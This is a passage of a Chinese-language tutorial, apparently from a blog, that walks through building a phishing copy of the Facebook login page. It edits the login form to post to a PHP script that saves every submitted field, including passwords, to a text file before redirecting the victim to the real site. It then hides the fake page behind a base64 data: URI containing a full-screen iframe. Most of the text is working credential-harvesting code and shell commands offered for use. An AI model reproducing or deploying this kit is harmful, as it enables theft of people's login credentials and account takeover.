1
|
<form id=“login_form” action=“https://www.facebook.com/login.php?login_attempt=1″ method=“post” onsubmit=“return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”>
|
将action的值改为
1
|
action=login.php?“https://www.facebook.com/login.php?login_attempt=1″
|
将index.html放到web目录下(我的放置在/Library/WebServer/Documents/facebook目录下)
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?php
header (‘Location: https://www.facebook.com ‘);//跳转到真实的facebook页面
$handle = fopen(“password.txt”, “a”);//将假页面中提交的POST数据写入password.txt文件中
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “/r/n”);
}
fwrite($handle, “===============/r/n”);
fclose($handle);
exit;
?>
|
第三步:创建接收POST数据的password.txt文件
1
2
3
4
5
|
dani-2:facebook leedani$ pwd
/Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt
dani-2:facebook leedani$ sudo chmod a+w password.txt
|
第四步:测试
1
|
dani-2:facebook leedani$ cat password.txt
|
二、制作钓鱼URI
1
2
|
<style> body {margin:0; overflow:hidden;}</style>
<iframe src=“https://static-js.b0.upaiyun.com/wp-content/uploads/auto_save_image/2013/04/134355K2K.jpg” height=“100%” width=“100%” border=“no” frameBorder=“0″ scrolling=“auto”>iFrame Failed</iframe>
|
第二步:将攻击代码转换为data: URI
1
|
data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+
|
将上面的data: URI中的data:text/plain改成data:text/html
1
|
data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+
|
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号